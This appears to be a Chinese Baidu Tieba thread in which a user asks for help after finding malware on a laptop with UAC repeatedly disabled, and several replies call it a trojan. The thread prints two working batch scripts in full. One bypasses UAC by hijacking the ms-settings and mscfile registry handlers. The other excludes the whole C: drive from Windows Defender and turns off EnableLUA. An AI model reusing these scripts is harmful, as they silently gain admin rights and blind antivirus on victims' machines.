网页资讯视频图片知道文库贴吧地图采购
进入贴吧全吧搜索
病毒吧 关注:288,943贴子:1,143,681
  • 19回复贴,共1

救救孩子吧

只看楼主收藏回复

不知道从什么时候起,鼠鼠的笔记本就会抽风自动给UAC关了,鼠鼠以为是win11特性,所以就没有理会,直到有一次打游戏弹出来一个cmd闪一下就过了,鼠鼠才发现好像不对劲,然后就下了个360(别骂,平常为了玩破解游戏就把wd关掉了,而且听说360调教好也不烦人所以就下了360)瞧瞧,360扫出来没问题,然后鼠鼠就又没管了
IP属地:广东1楼2024-03-27 20:07回复
    鼠鼠又去打游戏了,360救鼠一命,每隔一个小时弹一次提醒,鼠鼠这才发现这躺了三个文件
    IP属地:广东2楼2024-03-27 20:09
    回复
      IP属地:广东3楼2024-03-27 20:09
      收起回复
        三个文件内容:
        b.bat :
        @璐村惂鐢ㄦ埛_000076K馃惥 off
        set PAYLOAD=C:\Users\Public\Downloads\Service.exe
        net session >nul 2>&1 || goto :label
        %PAYLOAD%
        exit /b 2
        :label
        whoami /groups|findstr /i "\<S-1-5-32-544\>" >nul 2>&1
        if ERRORLEVEL 1 exit /b 1
        for /f "tokens=4-5 delims=. " %%i in ('ver') do set WIN_VER=%%i.%%j
        set key="HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System"
        for /f "skip=2 tokens=3" %%U in ('REG QUERY %key% /v ConsentPromptBehaviorAdmin') do set /a "UAC=%%U"
        if %UAC% equ 2 exit /b 1
        if %UAC% equ 5 (
        for %%V in (6.1 6.2 6.3) do if "%WIN_VER%" == "%%V" call :exploit mscfile CompMgmtLauncher.exe %PAYLOAD%
        if "%WIN_VER%" == "10.0" call :exploit ms-settings ComputerDefaults.exe %PAYLOAD%
        )>nul 2>&1
        if %UAC% equ 0 powershell -c Start-Process "%PAYLOAD%" -Verb runas
        exit /b 0
        :exploit <key> <trigger> <payload>
        set regPath="HKCU\Software\Classes\%1\shell\open\command"
        reg add %regPath% /d "%~3" /f
        reg add %regPath% /v DelegateExecute /f
        %~2
        reg delete "HKCU\Software\Classes\%1" /f
        exit /b
        IP属地:广东4楼2024-03-27 20:12
        收起回复
          services.exe可以解压,解压出来是babel.bat:
          @璐村惂鐢ㄦ埛_000076K馃惥 off
          PowerShell -NoProfile -ExecutionPolicy Bypass -Command ^
          "$defenderExclusions = Get-MpPreference; ^
          $defenderExclusions.ExclusionPath = $defenderExclusions.ExclusionPath + 'C:\'; ^
          Set-MpPreference -ExclusionPath $defenderExclusions.ExclusionPath"
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          exit /B
          IP属地:广东6楼2024-03-27 20:13
          收起回复
            救救鼠啊啊,好像这些东西都存在这好久了,不要紧吧?
            IP属地:广东7楼2024-03-27 20:14
            收起回复
              建议立刻把360换成卡巴斯基全盘扫描,这玩意儿大概率是木马
              IP属地:美国来自Android客户端8楼2024-03-28 11:01
              回复
                那楼主我问你,你为什么在这之前不安装杀毒软件?
                IP属地:山东9楼2024-03-28 11:23
                收起回复
                  看起来有修改注册表绕UAC的行为,大概是木马
                  IP属地:浙江来自Android客户端10楼2024-04-08 12:51
                  回复

                    扫二维码下载贴吧客户端

                    下载贴吧APP
                    看高清直播、视频!
                    • 19回复贴,共1
                    发表回复
                    发贴请遵守贴吧协议及“七条底线”贴吧投诉
                    内  容:
                      查看全部
                    发 表
                    保存至快速回贴